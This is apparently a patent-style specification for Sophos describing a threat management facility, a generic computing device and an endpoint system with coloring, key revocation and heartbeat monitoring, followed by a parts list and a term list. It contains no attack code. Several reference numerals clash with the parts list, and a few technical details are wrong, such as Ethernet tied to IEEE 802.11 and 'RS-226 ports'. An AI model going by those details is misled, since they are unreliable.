Client: Sophos

Threat Management System


Drawings

Brief Description:

illustrates an environment for threat management

Detailed Description:

Figure 1 illustrates an environment for threat management. Specifically, Figure 1 depicts a block diagram of a threat management facility 168 providing protection to one or more enterprises, networks, locations, users, businesses, etc. against a variety of threats–a context in which the techniques disclosed herein may usefully be deployed. The threat management facility 168 may be used to protect devices and assets (e.g., IoT devices or other devices) from computer-generated and human-generated threats. For example, a corporation, school, web site, homeowner, network administrator, or other entity may institute and enforce one or more policies that control or prevents certain network users (e.g. employees, residents, users, guests, etc.) from accessing certain types of applications, devices, resources generally or in a particular manner. Policies may be created, deployed and managed, for example, through the threat management facility 168, which may update and monitor network devices, users, and assets accordingly. 

The threat of malware or other compromise may be present at various points within a network 170 such as laptops, desktops, servers, gateways, communication ports, handheld or mobile devices, IoT devices, firewalls. In addition to controlling or stopping malicious code, a threat management facility 168 may provide policy management to controldevices, applications, or users that might otherwise undermine productivity and network performance within the network 170

The threat management facility 168 may provide protection to network 170 from computer-based malware, including viruses, spyware, adware, trojans, intrusion, spam, policy abuse, advanced persistent threats, uncontrolled access, and the like. In general, the network 170 may be any networked computer-based infrastructure or the like managed by the threat management facility 168, such as an organization, association, institution, or the like, or a cloud-based facility that is available for subscription by individuals. For example, the network 170 may be a corporate, commercial, educational, governmental, or other network 170, and may include multiple networks, computing resources, and other facilities, may be distributed among more than one geographical locations, and may include an administration facility 108, a firewall 110, an appliance 144, a server 136, network devices 132-B, clients 114-D, such as IoT devices or other devices. It will be understood that any reference herein to a client or client facilities may include the clients 114-D shown in Figure 1 and vice-versa. Further, the recitation of an element number ending with a letter should be understood to refer to a particular instance of the element, and the recitation of an element number without a letter should be understood to refer to any one or more instances of the element. Thus, for example, the recitation of the client 114 should be understood to refer only to the specific instance of the client labeled 114 in Figure 1, while the recitation of the clients 144 should be understood to refer to any one or more instances of the client labeled 114, 116, 118, 128, 126, 130, 120 in Figure 1, unless otherwise specified or made clear from the context.

The threat management facility 168 may include computers, software, or other computing facilities supporting a plurality of functions, such as one or more of a security management facility 102, a policy management facility 146, an update facility 150, a definitions management facility 156, a network access rules facility 106, a remedial action facility 152, a detection techniques facility 148, a testing facility 164, a threat research facility 104, and the like. In embodiments, the threat protection provided by the threat management facility 400 may extend beyond the network boundaries of the network 170 to include clients 128 (or client facilities) that have moved into network connectivity not directly associated with or controlled by the network 170. Threats to client facilities may come from a variety of sources, such as from network threats 154, physical proximity threats 158, a secondary location threat network 162, and the like. Clients 114-D may be protected from threats even when the client 114-D is not directly connected to or in association with the network 170, such as when a client 126-F moves in and out of the network 170, for example when interfacing with an unprotected server 138 through the internet 160, when a client 130 is moving into the secondary location threat network 162 such as interfacing with components that are not protected (e.g., the appliance 166, the server 142, the network devices 122, 124, and the like). 

The threat management facility 168 may use or may be included in an integrated system approach to provide the network 170 with protection from a plurality of threats to device resources in a plurality of locations and network configurations. The threat management facility 168 may also or instead be deployed as a stand-alone solution. For example, some or all of the threat management facility 168components may be integrated into a server or servers at a remote location, for example in a cloud computing facility. For example, some or all of the threat management facility 168components may be integrated into a firewall, gateway, or access point within or at the border of the network 170. In some embodiments, the threat management facility 168 may be integrated into a product, such as a third-party product (e.g., through an application programming interface), which may be deployed on endpoints, on remote servers, on internal servers or gateways for a network, or some combination of these. 

The security management facility 102 may include a plurality of elements that provide protection from malware to device resources of the network 170 in a variety of ways, including endpoint security and control, email security and control, web security and control, reputation-based filtering, control of unauthorized users, control of guest and non-compliant computers, and the like. The security management facility 102 may include a local software application that provides protection to one or more device resources of the network 402. The security management facility 102 may have the ability to scan client facility files for malicious code, remove or quarantine certain applications and files, prevent certain actions, perform remedial actions and perform other security measures. This may include scanning some or all of the files stored on the client facility or accessed by the client facility on a periodic basis, scanning an application when the application is executed, scanning data (e.g., files or other communication) in transit to or from a device, etc. The scanning of applications and files may be performed to detect known or unknown malicious code or unwanted applications

The security management facility 102 may provide email security and control. The security management facility 102 may also or instead provide for web security and control, such as by helping to detect or block viruses, spyware, malware, unwanted applications, and the like, or by helping to controlweb browsing activity originating from client devices. In certain embodiments, the security management facility 102 may provide for network access control, which may provide control over network connections. In addition, network access control may controlaccess to virtual private networks (VPN) that provide communications networks tunneled through other networks. The security management facility 102 may provide host intrusion prevention through behavioral based analysis of code, which may guard against known or unknown threats by analyzing behavior before or while code executes. Further, or instead, the security management facility 102 may provide reputation filtering, which may target or identify sources of code

In embodiments, the security management facility 102 may use wireless characteristics to identify a device on the network 170. For example, the security management facility 102 may determine a reliability index value of any one or more devices (e.g., the servers 142, the clients 144, and combinations thereof) connected via a wireless link to the network 170, for example, an IoT device. Through one or more access points (e.g., the firewall 110) or other sensor (e.g., the appliance 144) in the network 170, the security management facility 102 may monitor RF characteristics of the IoT device to obtain current RF characteristics. The security management facility 102 may compare the current RF characteristics to baseline RF characteristics, and when there is a match between the current RF characteristics and the baseline RF characteristics based on the comparison, adjust the reliability index value to indicate greater reliability, and when there is not a match between the current RF characteristics and the baseline RF characteristics based on the comparison, adjusting the reliability index value to indicate lesser reliability, and when the reliability index value exceeds a threshold value, performing an action to reduce a potential threat of the IoT device to the network. This aspect of the security management facility 102 may also take place on the firewall 110 (e.g., an access point) or appliance 144

In general, the security management facility 102 may support overall security of the network 170 using the various techniques described above, optionally as supplemented by updates of malicious code information and so forth for distribution across the network 170

The administration facility 108 may provide control over the security management facility 102 when updates are performed. Information from the security management facility 102 may also be sent from the enterprise back to a third party, a vendor, or the like, which may lead to improved performance of the threat management facility 168

The policy management facility 146 of the threat management facility 168 may be configured to take actions, such as to block applications, users, communications, devices, and so on based on determinations made. The policy management facility 146 may employ a set of rules or policies that determine network 170access permissions for one or more of the clients 144. In some embodiments, a policy database may include a block list, a black list, an allowed list, a white list, or the like, or combinations of the foregoing, that may provide a list of resources internal or external to the network 170 that may or may not be accessed by the clients 144. The policy management facility 146 may also or instead include rule-based filtering of access requests or resource requests, or other suitable techniques for controlling access to resources consistent with a corresponding policy

In embodiments, the policy management facility 146 may include reliability index thresholds for devices, such as IoT devices. The policy management facility 146 may include policies to permit or deny access, to take remedial action, to issue alerts, and so on based on particular reliability index determinations

The policy management facility 146 may also or instead provide configuration policies to be used to compare and control the configuration of applications, operating systems, hardware, devices, and the like associated with the network 170. An evolving threat environment may dictate timely updates, and thus the update management facility 150 may also be provided by the threat management facility 168. In addition, the policy management facility 146 may require update management (e.g., as provided by the update facility 150 herein described). In embodiments, the update management facility 150 may provide for patch management or other software updating, version control, and so forth. 

The security facility 102 and policy management facility 146 may push information to the network 170 and/or to a given one or more of the clients 144. The network 170 and/or one or more of the clients 114-F may also or instead request information from the security facility 102 and/or from the policy management facility 146, the servers 136-C, or there may be a combination of pushing and pulling of information. In some embodiments, the policy management facility 146 and the security facility 102 management update modules may work in concert to provide information to the network 170 and/or to one or more of the clients 114 facility for control of applications, devices, users, and so on. 

As threats are identified and characterized, the threat management facility 168 may create updates that may be used to allow the threat management facility 168 to detect and remediate malicious software, unwanted applications, configuration and policy changes, and the like. The definitions management facility 156 may contain threat identification updates, also referred to as definition files. A definition file may be a virus identity file that may include definitions of known or potential malicious code. The virus identity definition files may provide information that may identify malicious code within files, applications, or the like. The definition files may be accessed by the security management facility 102 when scanningfiles or applications within the client facility for the determination of malicious code that may be within the file or application. The definitions management facility 156 may include a definition for a neural network or other recognition engine. The definitions management facility 156 may provide timely updates of definition files information to the network, client facilities, and the like

In embodiments, the definitions management facility 156 may include default values or baseline values for RF characteristics of devices, such as IoT devices. For example, the definitions management facility 156 may include a baseline value for particular RF characteristics of a particular IoT device

The security management facility 102 may be used to scan an outgoing file and verify that the outgoing file is permitted to be transmitted per rules and policies of the network 170. By checking outgoing files, the security management facility 102 may be able to discover malicious code infected files that were not detected as incoming files

The threat management facility 168 may provide controlled access to the network 170. For example, the network access rules facility 106 may be responsible for determining if an application running on a given one or more of the clients 144 should be granted access to a requested network resource. In some embodiments, the network access rules facility 106 may verify access rights for one or more of the client facilities to or from the network 170 or may verify access rights of computer facilities to or from external networks. When network access for a client facility is denied, the network access rules facility 106 may send an information file to the client facility (e.g., a command or command file that the remedial action facility 428 may access and take action upon). The network access rules facility 106 may include one or more databases including one or more of a block list, a black list, an allowed list, a white list, a reputation list, an unacceptable network resource database, an acceptable network resource database, a network resource reputation database, or the like. The network access rules facility 106 may incorporate rule evaluation. Rule evaluation may, for example, parse network access requests and apply the parsed information to network accessrules. The network access rule facility 106 may also or instead provide updated rules and policies to the network 170

When a threat or policy violation is detected by the threat management facility 168, the threat management facility 168 may perform or initiate remedial action through the remedial action facility 152. Remedial action may take a variety of forms, such as terminating or modifying an ongoing process or interaction, issuing an alert, sending a warning (e.g., to a client or to the administration facility 108) of an ongoing process or interaction, executing a program or application to remediate against a threat or violation, record interactions for subsequent evaluation, and so forth. The remedial action may include one or more of blocking some or all requests to a network location or resource, performing a malicious code scan on a device or application, performing a malicious code scan on one or more of the clients 144, quarantining a related application (or files, processes or the like), terminating the application or device, isolating the application or device, moving a process or application code to a sandbox for evaluation, isolating one or more of the clients 144 to a location or status within the network that restricts network access, blocking a network access port from one or more of the clients 144, reporting the application to the administration facility 108, or the like, as well as any combination of the foregoing

In embodiments, remedial action may be taken based on a reliability index determination based on RF characteristics of a wireless device

Remedial action may be provided as a result of a detection of a threat or violation. The detection techniques facility 148 may include tools for monitoring the network 170 or managed devices within the network 170. The detection techniques facility 148 may provide functions such as monitoring activity and stored files on computing facilities. Detection techniques, such as scanning a computer’sstored files, may provide the capability of checking files for stored threats, either in the active or passive state. Detection techniques such as streaming file management may be used to check files received at the network 170, a gateway facility, a client facility, and the like

Verifying that the threat management facility 168 detects threats and violations to established policy, may require the ability to test the system, either at the system level or for a particular computing component. The testing facility 164 may allow the administration facility 108 to coordinate the testing of the security configurations of computing facilities of the clients 144 on the network 170. For example, the administration facility 108 may be able to send test files to a set of computing facilities of the clients 144 to test the ability of a given client facility to determine acceptability of the test file. After the test file has been transmitted, a recording facility may record the actions taken by one or more of the clients 144 in reaction to the test file. The recording facility may aggregate the testing information from the clients 144 and report the testing information to the administration facility 108. The administration facility 108 may be able to determine the level of preparedness of the respective clients 144 based on the reported information. Remedial action may be taken for any of the clients 144 as determined by the administration facility 108

The threat management facility 168 may provide threat protection across the network 170 to devices such as the clients 144, the servers 142, the administration facility 108, the firewall 138, a gateway, one or more of the network devices 148 (e.g., hubs and routers), one or more of the appliances 140 (e.g., a threat management appliance), any number of desktop or mobile users, and the like. As used herein, the term endpoint may refer to any compute instance running on a device that can source data, receive data, evaluate data, buffer data, process data or the like (such as a user’sdesktop computer, laptop, IoT device, server, etc.). This may, for example, include any client devices as well as other network devices and the like within the network 170, such as a firewall or gateway (as a data evaluation endpoint computer system), a laptop (as a mobile endpoint computer), a tablet (as a hand-held endpoint computer), a mobile phone, or the like. The term endpoint may also or instead refer to any final or intermediate source or destination for data within a network 170. An endpoint computer security facility 112 may be an application locally loaded onto any corresponding computer platform or computer support component, either for local security functions or for management by the threat management facility 168 or other remote resource, or any combination of these. 

The network 170 may include a plurality of client facility computing platforms (e.g., the clients 144) on which the endpoint computer security facility 112 is installed. A client facility computing platform may be a computer system that is able to access a service on another computer, such as one or more of the servers 142, via a network. The endpoint computer security facility 112 may, in corresponding fashion, provide security in any suitable context such as among a plurality of networked applications, for a client facility connecting to an application server facility, for a web browser client facility connecting to a web server facility, for an e-mail client facility retrieving e-mail from an internet 160service provider’smail storage servers or web site, and the like, as well as any variations or combinations of the foregoing. As used herein, any one or more of the application server facility, the web server facility, and the mail storage servers should be understood to include one or more of the servers 142. 

The network 170 may include one or more of the servers 142, such as application servers, communications servers, file servers, database servers, proxy servers, mail servers, fax servers, game servers, web servers, and the like. The servers 142, which may also be referred to as server facilities 142, server facility 142 applications, server facility 142 operating systems, server facility 142 computers, or the like, may be any device(s), application program(s), operating system(s), or combination of the foregoing that accepts client facility connections to service requests from the clients 144. In embodiments, the threat management facility 168 may provide threat protection to server facilities 142 within the network 170 as load conditions and application changes are made. 

The server facilities 142 may include an appliance facility 140, where the appliance facility 140 provides specific services to other devices on the network 170. The server facilities may also include simple appliances utilized across the network 170infrastructure, such as switches, routers, hubs, gateways, print servers, modems, and the like. These appliances may provide interconnection services within the network 170, and therefore may advance the spread of a threat if not properly protected. 

The clients 144 may be protected from threats from within the network 170 using a local or personal firewall, which may be a hardware firewall, software firewall, or a combination thereof, that controlsnetwork traffic to and from a client. The local firewall may permit or deny communications based on a security policy. The endpoint computer security facility 112 may additionally protect the firewall 110, which may include hardware or software, in a standalone device or integrated with another network component, that may be configured to permit, deny, or proxy data through the network 170

The interface between the threat management facility 168 and the network 170, and through the appliance 140 to embedded endpoint computer security facilities, may include a set of tools that may be the same or different for various implementations, and may allow each network administrator to implement custom controls. In embodiments, these controls may include both automatic actions and managed actions. The administration facility 108 may configure policy rules that determine interactions. The administration facility 108 may also establish license management, which in turn may further determine interactions associated with licensed applications. In embodiments, interactions between the threat management facility 168 and the network 170 may provide threat protection to the network 170 by managing the flow of network data into and out of the network 170 through automatic actions that may be configured by the threat management facility 168 for example by action or configuration of the administration facility 108

The clients 144 within the network 170 may be connected to the network 170 by way of the network devices 132-B, which may be wired devices or wireless facilities. The clients 144 may be mobile wireless facilities and, because of their ability to connect to a wireless network access point, may connect to the internet 160 outside the physical boundary of the network 170, and therefore outside the threat-protected environment of the network 170. Such mobile wireless facilities, if not for the presence of a locally-installed endpoint computer security facility 112, may be exposed to a malware attack or perform actions counter to policies of the network 170. Thus, the endpoint computer security facility 112 may provide local protection against various threats and policy violations. The threat management facility 168 may also or instead be configured to protect the out-of-enterprise facility mobile client facility (e.g., the clients 144) through interactions over the internet 160 (or other network) with the locally-installed endpoint computer security facility 112. Thus, mobile client facilities that are components of the network 170 but temporarily outside connectivity with the network 170 may be provided with the same or similar threat protection and policy control provided to the clients 144 inside the network 170. In addition, mobile client facilities (e.g., the clients 444) may receive the same interactions to and from the threat management facility 168 as client facilities 144 inside the enterprise facility 102, such as by receiving the same or equivalent services via an embedded endpoint computer security facility 112. 

Interactions between the threat management facility 168 and the components of the network 170, including mobile client facility extensions of the network 170, may ultimately be connected through the internet 160 or any other network or combination of networks. Security-related or policy-related downloads and upgrades to the network 170 may be passed from the threat management facility 168 through to components of the network 170 equipped with the endpoint computer security facility 112. In turn, the endpoint computer security facilities 112 of the enterprise facility 102 may upload policy and access requests back across the internet 160 and through to the threat management facility 168. The internet 160, however, is also the path through which threats may be transmitted from their source, and one or more of the endpoint computer security facilities 112 may be configured to protect a device outside the network 170 through locally-deployed protective measures and through suitable interactions with the threat management facility 168

Thus, if the mobile client facility were to attempt to connect into an unprotected connection point, such as at the secondary location threat network 162 that is not a part of the network 170, the mobile client facility, such as one or more of the clients 144, may be required to request network interactions through the threat management facility 168, where contacting the threat management facility 168 may be performed prior to any other network action. In embodiments, the endpoint computer security facility 112 of the client 144 may manage actions in unprotected network environments such as when the client facility (e.g., the client 130) is in a secondary location 162, where the endpoint computer security facility 112 may dictate which applications, actions, resources, users, etc. are allowed, blocked, modified, or the like

The secondary location threat network 162 may have no endpoint computer security facilities 112 as a part of its components, such as the firewall 140, the server 142, the client 120, the network devices 448C-D (e.g., hubs and routers), and the like. As a result, the components of the secondary location threat network 162 may be open to threat attacks, and may become potential sources of threats, as well as any mobile enterprise facility clients (e.g., the clients 116-F) that may be connected to the secondary location threat network 162. In such instances, these components may now unknowingly spread a threat to other devices connected to the network 170

Some threats do not come directly from the internet 160. For example, one or more physical proximity threats 158 may be deployed on a client device while that device is connected to an unprotected network connection outside the network 170 and, when the client device is subsequently connected to one or more of the clients 144 on the network 402, the device can deploy malware or otherwise pose a threat. In embodiments, the endpoint computer security facility 112 may protect the network 170 against these types of physical proximity threats 158, for instance, through scanning any device prior to allowing data transfers, through security validation certificates, through establishing a safe zone within the network 170 to receive data for evaluation, and the like

Brief Description:

illustrates a computer system 200 in accordance with one embodiment.

Detailed Description:

Figure 2 illustrates a computer system. In general, the computer system 200 may include a computing device 206 connected to a network 202, for example, through an external device 204. The computing device 206 may be or may include any type of network endpoint or endpoints as described herein such as, for example, the network endpoints described above with reference to Figure 1. For example, the computing device 206 may include a desktop computer workstation. The computing device 206 may also or instead be any suitable device that has processes and communicates over the network 202 including, without limitation, a laptop computer, a desktop computer, a personal digital assistant, a tablet, a mobile phone, a television, a set top box, a wearable computer (e.g., watch, jewelry, or clothing), a home device (e.g., a thermostat or a home appliance controller), just as some examples. The computing device 206 may also or instead include a server, or it may be disposed on a server

The computing device 206 may be used for any of the entities described in the threat management environment described above with reference to Figure 1. For example, the computing device 206 may be a server, a client an enterprise facility, a threat management facility, or any of the other facilities or computing devices described therein. In certain aspects, the computing device 206 may be implemented using hardware (e.g., in a desktop computer), software (e.g., in a virtual machine or the like), or a combination of software and hardware, and the computing device 206 may be a standalone device, a device integrated into another entity or device, a platform distributed across multiple entities, or a virtualized device executing in a virtualization environment

The network 202 may include any network described above, e.g., data network(s) or internetwork(s) suitable for communicating data and control information among participants in the computer system 200. This may include public networks such as the internet, private networks, and telecommunications networks such as the Public Switched Telephone Network or cellular networks using third generation cellular technology (e.g., 3G or IMT-2000), fourth generation cellular technology (e.g., 4G, LTE. MT-Advanced, E-UTRA, etc.) or WiMax-Advanced (IEEE 802.16m)) and/or other technologies, as well as any of a variety of corporate area, metropolitan area, campus or other local area networks or enterprise networks, along with any switches, routers, hubs, gateways, and the like that might be used to carry data among participants in the computer system 200. The network 202 may also include a combination of data networks, and need not be limited to a strictly public or private network

The external device 204 may be any computer or other remote resource that connects to the computing device 206 through the network 202. This may include threat management resources such as any of those contemplated above, gateways or other network devices, remote servers or the like containing content requested by the computing device 206, a network storage device or resource, a device hostingmalicious content, or any other resource or device that might connect to the computing device 206 through the network 202

The computing device 206 may include a processor 208, a memory 210, a network interface 212, a data store 214, and one or more input/output interface 216. The computing device 206 may further include or be in communication with peripherals 218 and other external input/output interface 216

The processor 208 may be any as described herein, and in general may be capable of processing instructions for execution within the computing device 206or computer systemcomputer system 200. The processor 208 may include a single-threaded processor or a multi-threaded processor. The processor 208 may be capable of processing instructions stored in the memory 210 or on the data store 214

The memory 210 may store information within the computing device 206or computer systemcomputer system 200. The memory 210 may include any volatile or non-volatile memory or other computer-readable medium, including without limitation a Random-Access Memory (RAM), a flash memory, a read Only memory (ROM), a Programmable Read-only Memory (PROM), an Erasable PROM (EPROM), registers, and so forth. The memory 210 may store program instructions, program data, executables, and other software and data useful for controlling operation of the computing device 200 and configuring the computing device 200 to perform functions for a user. The memory 210 may include a number of different stages and types for different aspects of operation of the computing device 206. For example, a processor (e.g., the processor 208) may include on-board memory and/or cache for faster access to certain data or instructions, and a separate, main memory or the like may be included to expand memory capacity as desired. 

The memory 210 may, in general, include a non-volatile computer readable medium containing computer code that, when executed by the computing device 200 creates an execution environment for a computer program in question (e.g., code that constitutes processor firmware, a protocol stack, a database management system, an operating system, or a combination of the foregoing, and/or code that performs some or all of the steps set forth in the various flow charts and other algorithmic descriptions set forth herein). While the memory 210 is depicted as a single memory, it will be understood that any number of memories may be usefully incorporated into the computing device 206. For example, a first memory may provide non-volatile storage such as a disk drive for permanent or long-term storage of files and code even when the computing device 206 is powered down. A second memory such as a Random-Access Memory may provide volatile (but higher speed) memory for storing instructions and data for executing processes. A third memory may be used to improve performance by providing even higher speed memory physically adjacent to the processor 208 for registers, caching and so forth. 

The network interface 212 may include any hardware and/or software for connecting the computing device 206 in a communicating relationship with other resources through the network 202. This may include remote resources accessible through the internet, as well as local resources available using short range communicationsprotocols using, e.g., physical connections (e.g., ethernet), radio frequency communications (e.g., WiFi), optical communications, (e.g., fiber optics, infrared, or the like), ultrasonic communications, or any combination of these or other media that might be used to carry data between the computing device 206 and other devices. The network interface 212 may, for example, include a router, a modem, a network card, an infrared transceiver, a radio frequency (RF) transceiver, a near field communications interface, a radio-frequency identification (RFID) tag reader, or any other data reading or writing resource or the like

More generally, the network interface 212 may include any combination of hardware and software suitable for coupling the components of the computing device 206 to other computing or communications resources and, thus, may typically include one or more communication channels 222 and be connected to one or more networks (e.g., the network 202). By way of example and not limitation, this may include electronics for wired or wireless transmission of information over the network 202 either wirelessly or through a physical connection, depending on the needs of a specific implementation. As an example, the communication may be via an ethernet connection operating according to the IEEE 802.11 standard (or any variation thereof), or any other short or long range wireless networking components or the like. This may include hardware for short range data communications such as bluetooth or an infrared transceiver, which may be used to couple to other local devices, or to connect to a local area network or the like that is in turn coupled to a data network 202 such as the internet. This may also or instead include hardware/software for a WiMax connection or a cellular network connection (using, e.g., CDMA, GSM, LTE, or any other suitable protocol or combination of protocols). The network interface 212 may be included as part of the input/output interface 216 or vice-versa

The data store 214 may be any internal memory store providing a computer-readable medium such as a disk drive, an optical drive, a magnetic drive, a flash drive, or other device capable of providing mass storage for the computing device 206. The data store 214 may store computer readable instructions, data structures, program modules, and other data for the computing device 206or computer systemcomputer system 200 in a non-volatile form for subsequent retrieval and use. For example, the data store 214 may store without limitation one or more of the operating system, application programs, program data, databases, files, and other program modules or other software objects and the like

The input/output interface 216 may support input from and output to other devices that might couple to the computing device 206. This may, for example, include serial ports (e.g., RS-226 ports), universal serial bus (USB) ports, optical ports, ethernet ports, telephone ports, audio jacks, component audio/video inputs, HDMI ports, and so forth, any of which might be used to form wired connections to other local devices. This may also or instead include an infrared interface, RF interface, magnetic card reader, or other input/output system for coupling in a communicating relationship with other local devices. It will be understood that, while the network interface 212 for network communications is described separately from the input/output interface 216 for local device communications, these two interfaces may be the same, or may share functionality, such as where a USB port is used to attach to a WiFi accessory, or where an ethernet connection is used to couple to a local network attached storage

A peripheral 218 may include any device used to provide information to or receive information from the computing device 200. This may include human input/output (I/O) devices such as a keyboard, a mouse, a mouse pad, a track ball, a joystick, a microphone, a foot pedal, a camera, a touch screen, a scanner, or other device that might be employed by the user 224 to provide input to the computing device 206. This may also or instead include a display, a speaker, a printer, a projector, a headset or any other audiovisual device for presenting information to a user. The peripheral 218 may also or instead include a digital signal processing device, an actuator, or other device to support control or communication to other devices or components. Other I/O devices suitable for use as a peripheral 218 include haptic devices, three-dimensional rendering systems, augmented-reality displays, magnetic card readers, and so forth. In one aspect, the peripheral 218 may serve as the network interface 212, such as with a USB device configured to provide communications via short range (e.g., bluetooth, WiFi, infrared, RF, or the like) or long range (e.g., cellular data or WiMax) communicationsprotocols. In another aspect, the peripheral 218 may provide a device to augment operation of the computing device 206, such as a global positioning system (GPS) device, a security dongle, or the like. In another aspect, the peripheral may be a storage device such as a flash card, USB drive, or other solid-state device, or an optical drive, a magnetic drive, a disk drive, or other device or combination of devices suitable for bulk storage. More generally, any device or combination of devices suitable for use with the computing device 200 may be used as the peripheral 218 as contemplated herein

Other hardware 220 may be incorporated into the computing device 200. Examples of the other hardware 220 include a co-processor, a digital signal processing system, a math co-processor, a graphics engine, a video driver, and so forth. The other hardware 220 may also or instead include expanded input/output ports, extra memory, additional drives (e.g., a DVD drive or other accessory), and so forth. 

A bus 226 or combination of busses may serve as an electromechanical platform for interconnecting components of the computing device 200, such as the processor 208, the memory 210, the network interface 212, the other hardware 220, the data store 214, and an input/output interface. As shown in the figure, each of the components of the computing device 206 may be interconnected using the bus 226 or other communication mechanism for communicating information

Methods and systems described herein can be realized using the processor 208 of the computer system 200 to execute one or more sequences of instructions contained in the memory 210 to perform predetermined tasks. In embodiments, the computing device 200 may be deployed as a number of parallel processors synchronized to execute code together for improved performance, or the computing device 200 may be realized in a virtualized environment where software on a hypervisor or other virtualization management facility emulates components of the computing device 200 as appropriate to reproduce some or all of the functions of a hardware instantiation of the computing device 200. 

Brief Description:

illustrates a threat management system 300 in accordance with one embodiment.

Detailed Description:

Figure 3 illustrates an exemplary threat management system 300 as contemplated herein. In general, the threat management system may include an endpoint 302 for example, a laptop, or a device such as an IoT device, an access point 304, a server 306 and a threat management facility 308 in communication with one another directly or indirectly through a data network 316, for example, as generally described above. Each of the entities depicted in Figure 3, may, for example, be implemented on one or more computing devices such as the computing device described above with reference to Figure 2

A number of systems may be distributed across these various components to support threat management, for example, including a coloring system 310, a key management system 312 and a heartbeat system 314, each of which may include software components executing on any of the foregoing system components, and each of which may communicate with the threat management facility 308 or an endpoint threat protection agent 318 executing on an endpoint 302, on an access point or a firewall 304, or on a server 306 to support improved threat detection and remediation

The coloring system 310 may be used to label or `color` software objects for improved tracking and detection of potentially harmful activity. The coloring system 310 may, for example, label files, executables, processes, network communications, data sources and so forth with any suitable label. A variety of techniques may be used to select static and/or dynamic labels for any of these various objects, and to manage the mechanics of applying and propagatingcoloring information as appropriate. For example, a process may inherit a color from an application that launches the process. Similarly, a file may inherit a color from a device when it is created or opened by a device, and/or a process may inherit a color from a file that the process has opened. More generally, any type of labeling, as well as rules for propagating, inheriting, changing, or otherwise manipulating such labels, may be used by the coloring system 310 as contemplated herein. A color may be or may be based on one or more reliability index values, the meeting of one or more reliability index thresholds, the rate of change of one or more reliability index values, etc. A color of a device may be used in a security policy. A color of a process, a file, a network request, and so on may be based on a color of a device, and that color may be used in a security policy

The key management system 312 may support management of keys for the endpoint 302 in order to selectively permit or prevent access to content on the endpoint 302 on a file-specific basis, a process-specific basis, an application-specific basis, a user-specific basis, or any other suitable basis in order to prevent data leakage, and in order to support more fine-grained and immediate control over access to content on the endpoint 302 when a security compromise is detected. Thus, for example, if a particular process executing on the endpoint is compromised, or potentially compromised or otherwise under suspicion, keys to that process may be revoked in order to prevent, for example, data leakage or other malicious activity. In embodiments, keys on device may be revoked based on one or more reliability index values, the meeting of one or more reliability index thresholds, the rate of change of one or more reliability index values, etc. 

The heartbeat system 314 may be used to provide periodic or aperiodic information from an endpoint about system health, security, status, etc. A heartbeat may be encrypted or plaintext, or some combination of these, and may be communicated unidirectionally (e.g., from the endpoint 302 to the threat management facility 308) or bidirectionally (e.g., between the endpoint 302 and the server 306, or any other pair of system components) on a useful schedule

In implementations, the access point or firewall 304 may use the heartbeat 314 to report a potential or actual compromise of a device based, for example, on a color of the device, or based on one or more reliability index values, the meeting of one or more reliability index thresholds, the rate of change of one or more reliability index values, etc. The heartbeat 314 from the access point 304 may be communicated to the server 306, for example, and administrative server or directly or indirectly to a threat management facility 308. If the endpoint device 302 has an endpoint threat protection facility 318, the endpoint threat protection facility 318 may be used to investigate further the status, or to take remedial measures, again by communication using the secure heartbeat 314. 

In general, these various monitoring and management systems may cooperate to provide improved threat detection and response. For example, the coloring system 310 may be used to evaluate when a particular device is potentially compromised, and a potential threat may be confirmed based on an interrupted heartbeat from the heartbeat system 314 or by information communicated in a heartbeat. The key management system 312 may then be used to revoke keys to a process so that no further files can be opened, deleted or otherwise modified. More generally, the cooperation of these systems enables a wide variety of reactive measures that can improve detection and remediation of potential threats to an endpoint


Parts List

102

security management facility

104

threat research facility

106

network access rules facility

108

administration facility

110

firewall

112

security facility

114

clients

116

clients

118

clients

120

clients

122

network devices

124

network devices

126

clients

128

clients

130

clients

132

network devices

134

network devices

136

server

138

server

140

firewall

142

server

144

appliance

146

policy management

148

detection techniques

150

updates

152

remedial actions

154

network threats

156

definitions

158

physical proximity threats

160

internet

162

secondary location threat network

164

testing

166

appliance

168

threat management facility

170

network

200

computer system

202

network

204

external device

206

computing device

208

processor

210

memory

212

network interface

214

data store

216

input/output interface

218

peripherals

220

other hardware

222

224

user

226

bus

300

threat management system

302

endpoint

304

access point or firewall

306

server

308

threat management facility

310

coloring system

312

key management system

314

heartbeat system

316

data network

318

endpoint threat protection facility


Terms/Definitions

various points

local security functions

list

wireless characteristics

application code

network connectivity

hardware instantiation

interfacing

peripheral

volatile or non-volatile memory

threat research facility

incoming files

e-mail

security dongle

perform actions

malicious content

heartbeat

E-UTRA

reaction

unprotected network environments

other suitable basis

other local area networks

hand-held endpoint computer

data networks

letter

testing facility

load conditions and application changes

stored threats

remote servers

types

local area network

policy management facility

service

allowed list

memory

remedial action

server a

protocol stack

suspicion

computer program

unauthorized users

stand-alone solution

access point

actuator

FIG. 1 and vice-versa

single-threaded processor

update management

remote resources

particular device

virtual machine

potential threats

network

network component

threshold value

guest

strictly public

long range

laptop

application servers, communications servers

applications

permanent or long-term storage

resources

RS-232 ports

data store

definitions

administration facility

black list

magnetic card reader

one or more databases

virus identity file

EPROM

transit

unprotected server

reputation list

embodiments

devices and assets

interactions

information file

mouse

memories

proxy data

particular computing component

software objects

rule evaluation

foregoing

techniques

known or potential malicious code

information

e.g. employees

related application (or files

suitable label

other software updating, version control

functionality

RF characteristics

or other media

executables

threat identification updates

local device communications

path

coupling

policies

camera

hubs and routers

detection techniques facility

connectivity

specific implementation

actual compromise

internal servers or gateways

execution

touch screen

electromechanical platform

ethernet

users

data sources

clients

devices

communication

cloud-based facility

security

checking files

propagating

sources

server

coloring system

appliance

endpoint security and control

network access rule facility

software firewall

transmitted per rules

mouse pad

alerts

mobile wireless facilities

unprotected connection point

hubs

action or configuration

databases

universal serial bus

device

couple

buffer data

element

institution

ways

short range data communications

guests

remedial actions

various monitoring

servers

ethernet connection operating

third generation cellular technology

application-specific basis

definitions management facility

addition

magnetic drive

communications networks

scanning

one or more enterprises

graphics engine

forms

behavioral based analysis

execution environment

virus identity definition files

update management facility

detection and remediation

optical drive

testing information

security policy

switches

operating systems

interconnecting components

network administrator

math co-processor

aperiodic information

improved threat detection and remediation

threats

multiple networks

detection

enterprise networks

other software and data

network resource reputation database

other suitable techniques

overall security

predetermined tasks

aspect

USB drive

respective clients

service requests

endpoint device

RF interface

input

endpoint threat protection agent

particular reliability index determinations

web site

patch management

computer facilities

desktops

particular instance

security validation certificates

digital signal processing device

test files

policy control

reputation filtering

data structures

second memory

malicious code

hardware and/or software

Other I/O devices

file-specific basis

certain embodiments

other communication

ethernet connection

neural network

wide variety

even higher speed memory

definition

block list

label files

license management

terminating

behavior

